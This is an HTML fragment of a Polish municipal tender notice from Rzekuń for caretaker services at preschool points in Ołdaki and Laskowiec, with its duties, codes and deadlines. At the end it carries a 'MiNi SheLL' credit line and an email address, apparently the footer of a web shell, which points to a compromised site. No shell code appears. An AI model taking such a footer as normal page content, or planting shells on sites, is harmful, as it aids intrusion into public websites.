<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług pełnienia funkcji opiekuna w punkcie przedszkolnym przy Szkole Podstawowej w Ołdakach w gminie Rzekuń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekunów dla  dzieci w wieku          od  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych  w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 
1)Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja      w  wykonywaniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług pełnienia funkcji opiekuna w punkcie przedszkolnym przy Szkole Podstawowej w Laskowcu w gminie Rzekuń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekunów dla  dzieci w wieku           od  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 
1)Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja       w  wykonywaniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com